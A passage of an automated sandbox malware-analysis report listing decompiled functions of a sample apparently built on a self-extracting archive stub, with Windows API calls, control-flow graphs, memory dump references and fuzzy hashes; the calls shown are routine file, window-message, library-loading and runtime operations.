                                                                                                                                  • GetLastError.KERNEL32(?,?,008A7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008A996C
                                                                                                                                  • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,008A7760,?,00000005,?), ref: 008A99A2
                                                                                                                                  • GetLastError.KERNEL32(?,?,008A7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008A99AA
                                                                                                                                  • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,008A7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008A99F9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CreateErrorLast$Time
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1999340476-0
                                                                                                                                  • Opcode ID: 5604364112dd7294325ed62712a762e90b8b80d76c185c7fec33340de091666a
                                                                                                                                  • Instruction ID: 1a688f3802f48e20e4d0f1e3886c65a883b6028adae851ab83107fafc9d71dd9
                                                                                                                                  • Opcode Fuzzy Hash: 5604364112dd7294325ed62712a762e90b8b80d76c185c7fec33340de091666a
                                                                                                                                  • Instruction Fuzzy Hash: 3631F030548745BFE7209B24CC46BDBBF98FB06320F280B19F9E1D65D1D7A4A954CB92
                                                                                                                                  Function 008BB568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1056 8bb568-8bb581 PeekMessageW 1057 8bb5bc-8bb5be 1056->1057 1058 8bb583-8bb597 GetMessageW 1056->1058 1059 8bb599-8bb5a6 IsDialogMessageW 1058->1059 1060 8bb5a8-8bb5b6 TranslateMessage DispatchMessageW 1058->1060 1059->1057 1059->1060 1060->1057
                                                                                                                                  APIs
                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008BB579
                                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008BB58A
                                                                                                                                  • IsDialogMessageW.USER32(00010424,?), ref: 008BB59E
                                                                                                                                  • TranslateMessage.USER32(?), ref: 008BB5AC
                                                                                                                                  • DispatchMessageW.USER32(?), ref: 008BB5B6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1266772231-0
                                                                                                                                  • Opcode ID: a70ff042610dbdbbe7b060ad0ff19285aef244d3f9cc72efe775941ac1b61a24
                                                                                                                                  • Instruction ID: 2fcb248607cbf5c39d341c76df01848708931fc8bbe2f8e1e830a9ce7d34044e
                                                                                                                                  • Opcode Fuzzy Hash: a70ff042610dbdbbe7b060ad0ff19285aef244d3f9cc72efe775941ac1b61a24
                                                                                                                                  • Instruction Fuzzy Hash: E7F0B771A1622AABCB20AFE6AC4CDDB7FBCEE056917008415B909D2150EB74D605DBB1
                                                                                                                                  Function 008BABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1061 8babab-8babca GetClassNameW 1062 8babcc-8babe1 call 8b1fbb 1061->1062 1063 8babf2-8babf4 1061->1063 1068 8babe3-8babef FindWindowExW 1062->1068 1069 8babf1 1062->1069 1064 8babff-8bac01 1063->1064 1065 8babf6-8babf9 SHAutoComplete 1063->1065 1065->1064 1068->1069 1069->1063
                                                                                                                                  APIs
                                                                                                                                  • GetClassNameW.USER32(?,?,00000050), ref: 008BABC2
                                                                                                                                  • SHAutoComplete.SHLWAPI(?,00000010), ref: 008BABF9
                                                                                                                                    • Part of subcall function 008B1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,008AC116,00000000,.exe,?,?,00000800,?,?,?,008B8E3C), ref: 008B1FD1
                                                                                                                                  • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 008BABE9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                  • String ID: EDIT
                                                                                                                                  • API String ID: 4243998846-3080729518
                                                                                                                                  • Opcode ID: 0982ec220c0386f2d3a8b22c5d8e12be277beb31c83aca32c70ee70fd21dcc27
                                                                                                                                  • Instruction ID: 635ad5e99d76d5edc816c2652aaf5b6908802d3479dcf140752b7e12fcf1838c
                                                                                                                                  • Opcode Fuzzy Hash: 0982ec220c0386f2d3a8b22c5d8e12be277beb31c83aca32c70ee70fd21dcc27
                                                                                                                                  • Instruction Fuzzy Hash: 67F082327012287BDB2056649C09FDB76BCEB46B50F488012FA45E6280DB61DA4585B6
                                                                                                                                  Function 008BDBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1070 8bdbde-8bdc09 call 8bec50 SetEnvironmentVariableW call 8b0371 1074 8bdc0e-8bdc12 1070->1074 1075 8bdc36-8bdc38 1074->1075 1076 8bdc14-8bdc18 1074->1076 1077 8bdc21-8bdc28 call 8b048d 1076->1077 1080 8bdc1a-8bdc20 1077->1080 1081 8bdc2a-8bdc30 SetEnvironmentVariableW 1077->1081 1080->1077 1081->1075
                                                                                                                                  APIs
                                                                                                                                  • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 008BDBF4
                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 008BDC30
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EnvironmentVariable
                                                                                                                                  • String ID: sfxcmd$sfxpar
                                                                                                                                  • API String ID: 1431749950-3493335439
                                                                                                                                  • Opcode ID: 1d9f9eb6f315e6d8807682a0439de70f83833ffed51329de5618fab2e9c1932c
                                                                                                                                  • Instruction ID: 06d18667d1f9a5fd78f92449bf673a1724ff6a273d852c675025ea4abfe173ac
                                                                                                                                  • Opcode Fuzzy Hash: 1d9f9eb6f315e6d8807682a0439de70f83833ffed51329de5618fab2e9c1932c
                                                                                                                                  • Instruction Fuzzy Hash: 52F0A772405339BACF211F988C06BEB3F98FF15785B040512BD85D5351E6B48940D6B1
                                                                                                                                  Function 008A9785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1082 8a9785-8a9791 1083 8a979e-8a97b5 ReadFile 1082->1083 1084 8a9793-8a979b GetStdHandle 1082->1084 1085 8a9811 1083->1085 1086 8a97b7-8a97c0 call 8a98bc 1083->1086 1084->1083 1087 8a9814-8a9817 1085->1087 1090 8a97d9-8a97dd 1086->1090 1091 8a97c2-8a97ca 1086->1091 1093 8a97ee-8a97f2 1090->1093 1094 8a97df-8a97e8 GetLastError 1090->1094 1091->1090 1092 8a97cc 1091->1092 1095 8a97cd-8a97d7 call 8a9785 1092->1095 1097 8a980c-8a980f 1093->1097 1098 8a97f4-8a97fc 1093->1098 1094->1093 1096 8a97ea-8a97ec 1094->1096 1095->1087 1096->1087 1097->1087 1098->1097 1099 8a97fe-8a9807 GetLastError 1098->1099 1099->1097 1101 8a9809-8a980a 1099->1101 1101->1095
                                                                                                                                  APIs
                                                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 008A9795
                                                                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 008A97AD
                                                                                                                                  • GetLastError.KERNEL32 ref: 008A97DF
                                                                                                                                  • GetLastError.KERNEL32 ref: 008A97FE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$FileHandleRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2244327787-0
                                                                                                                                  • Opcode ID: f6f81997cc2e2a59b73ea7b554ad0030c9320a8634d980f4630482ea5e5b67dc
                                                                                                                                  • Instruction ID: da49acf633eab5c92fc15aead0416aad99f0ae308ea668a97da2f528f1c766ba
                                                                                                                                  • Opcode Fuzzy Hash: f6f81997cc2e2a59b73ea7b554ad0030c9320a8634d980f4630482ea5e5b67dc
                                                                                                                                  • Instruction Fuzzy Hash: 5F11A530918608EBFF205F68C804A6937A9FB43724F20863AF496C5990E778DE44DB62
                                                                                                                                  Function 008CAD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,008C3F73,00000000,00000000,?,008CACDB,008C3F73,00000000,00000000,00000000,?,008CAED8,00000006,FlsSetValue), ref: 008CAD66
                                                                                                                                  • GetLastError.KERNEL32(?,008CACDB,008C3F73,00000000,00000000,00000000,?,008CAED8,00000006,FlsSetValue,008D7970,FlsSetValue,00000000,00000364,?,008C98B7), ref: 008CAD72
                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,008CACDB,008C3F73,00000000,00000000,00000000,?,008CAED8,00000006,FlsSetValue,008D7970,FlsSetValue,00000000), ref: 008CAD80
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                  • Opcode ID: 2c88e9f83c1d060f21f0f20306e9359e898428e54e4e3d6501b7b87e321fe9ed
                                                                                                                                  • Instruction ID: 09ce43f4dc83682a67b2986c25de1d0ff6cda9cfc49b896e633e5efabb1475ee
                                                                                                                                  • Opcode Fuzzy Hash: 2c88e9f83c1d060f21f0f20306e9359e898428e54e4e3d6501b7b87e321fe9ed
                                                                                                                                  • Instruction Fuzzy Hash: 2F01D43661222EAFC7254B68AC48F567BB8FF05BAB7114729FA07D3550DB31DC0186E2
                                                                                                                                  Function 008A9F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetStdHandle.KERNEL32(000000F5,?,?,?,?,008AD343,00000001,?,?,?,00000000,008B551D,?,?,?), ref: 008A9F9E
                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,008B551D,?,?,?,?,?,008B4FC7,?), ref: 008A9FE5
                                                                                                                                  • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,008AD343,00000001,?,?), ref: 008AA011
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite$Handle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4209713984-0
                                                                                                                                  • Opcode ID: 2e8d38d306e0688effc823259dae7ac0955b4bc13500657e700707d5fbb2c814
                                                                                                                                  • Instruction ID: 32d2cb527db70467524f80e1c9978c94b6d58d5ce3b3adba7ada13e38b298bb1
                                                                                                                                  • Opcode Fuzzy Hash: 2e8d38d306e0688effc823259dae7ac0955b4bc13500657e700707d5fbb2c814
                                                                                                                                  • Instruction Fuzzy Hash: DC31BF31208309EFEB18CF24D808B6A77A5FB86715F044619F981D7A90CB75AD48CBA2
                                                                                                                                  Function 008AA2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008AC27E: _wcslen.LIBCMT ref: 008AC284
                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,008AA175,?,00000001,00000000,?,?), ref: 008AA2D9
                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,008AA175,?,00000001,00000000,?,?), ref: 008AA30C
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,008AA175,?,00000001,00000000,?,?), ref: 008AA329
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2260680371-0
                                                                                                                                  • Opcode ID: a59aa01b9c653988c990986e680ab6eb27ade774b82d6824c8d2b5b3106363e5
                                                                                                                                  • Instruction ID: 3599c581c7e9598aa8e78c996cf63e134932de5cfe26389b46c0829efd19043a
                                                                                                                                  • Opcode Fuzzy Hash: a59aa01b9c653988c990986e680ab6eb27ade774b82d6824c8d2b5b3106363e5
                                                                                                                                  • Instruction Fuzzy Hash: 0A019E21201614AAFF39AB794C09BFD2788FF1B781F044415F902E6E81E764CA81C6B7
                                                                                                                                  Function 008CB893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 008CB8B8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Info
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1807457897-3916222277
                                                                                                                                  • Opcode ID: 091323d86496b1196ed1818fe456fb340a032c0565fe5cfb538c68d6c3fbeaef
                                                                                                                                  • Instruction ID: b7f35a42322e8c92d51e5a5540d762015d573f6c2718f9138cde58c0b117a3e7
                                                                                                                                  • Opcode Fuzzy Hash: 091323d86496b1196ed1818fe456fb340a032c0565fe5cfb538c68d6c3fbeaef
                                                                                                                                  • Instruction Fuzzy Hash: C241F67050469C9ADF218E28CC85FF6BBB9FB45308F1404EDE6DAC6142E335EA498B61
                                                                                                                                  Function 008CAF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 008CAFDD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String
                                                                                                                                  • String ID: LCMapStringEx
                                                                                                                                  • API String ID: 2568140703-3893581201
                                                                                                                                  • Opcode ID: 84ba458c78964385ad25f0213e0c64eed42c4c3689fcd1e5eab092baefd0c04f
                                                                                                                                  • Instruction ID: dfb65b7a0e36be2f25657483418ba6293d3e8fb74dcfd6d81813d704fcd22ff1
                                                                                                                                  • Opcode Fuzzy Hash: 84ba458c78964385ad25f0213e0c64eed42c4c3689fcd1e5eab092baefd0c04f
                                                                                                                                  • Instruction Fuzzy Hash: 2C01293250510DBBCF166F90DC05EEE7F62FF08754F01425AFE14A6260CA76C931AB82
                                                                                                                                  Function 008CAF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,008CA56F), ref: 008CAF55
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                  • String ID: InitializeCriticalSectionEx
                                                                                                                                  • API String ID: 2593887523-3084827643
                                                                                                                                  • Opcode ID: 0dc12bba643ee64982523a673a574c2dc22e1bd8d531ed37cfde0ab9ce9b06c8
                                                                                                                                  • Instruction ID: 9a9215cd95cf1bdfb6d7ea4e8007e9dc610c44706c6a2232bdccf8a45e8ec6f1
                                                                                                                                  • Opcode Fuzzy Hash: 0dc12bba643ee64982523a673a574c2dc22e1bd8d531ed37cfde0ab9ce9b06c8
                                                                                                                                  • Instruction Fuzzy Hash: 82F0B43264621CBBCF165F55CC16D9D7F61FF04B11B40426AFD18EA360EE358A109786
                                                                                                                                  Function 008CADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Alloc
                                                                                                                                  • String ID: FlsAlloc
                                                                                                                                  • API String ID: 2773662609-671089009
                                                                                                                                  • Opcode ID: 486d12248b91d884b18a065bb0140a05d0637272abb1a8484019a511b2602a0e
                                                                                                                                  • Instruction ID: 016289d6f7fd225b93a8b657e9aa94f5698d88030d4e39cca087670809b8d51d
                                                                                                                                  • Opcode Fuzzy Hash: 486d12248b91d884b18a065bb0140a05d0637272abb1a8484019a511b2602a0e
                                                                                                                                  • Instruction Fuzzy Hash: 9EE05C3264121C77C6046B65CC12E6D7B60FB04721B40025AF805D7340DD388E0042CB
                                                                                                                                  Function 008BEAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BEAF9
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
